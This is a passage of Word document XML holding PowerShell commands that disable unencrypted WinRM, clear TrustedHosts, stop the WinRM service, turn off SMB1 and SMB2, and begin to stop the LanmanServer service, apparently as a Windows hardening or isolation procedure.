        </w:rPr>
        <w:t>wsman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:\localhost\Service\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AllowUnencrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value $false -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2AC7EBB8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wsman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:\localhost\Client\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value '' -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="52AAC071" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7BA59DA4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Stop and disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1B9DA0AE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Stop-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0929EFAF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>StartupType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disabled -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="28DCB018" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="355C3FF1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Disable SMB2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2F0DD55F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SmbServerConfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -EnableSMB2Protocol $false -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="40BF68AA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0A1F22B8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Disable SMB1 and uninstall features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6783A1F7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Disable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WindowsOptionalFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Online -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>FeatureName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB1Protocol -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NoRestart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3FE9789E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Disable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WindowsOptionalFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Online -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>FeatureName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB1Protocol-Server -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NoRestart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7AC510D9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="752451A9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Reset SMB1 registry key (set to 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0D5DB1C4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Value 0 -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5E7958EF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7055B385" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Stop and disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="22D4E855" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
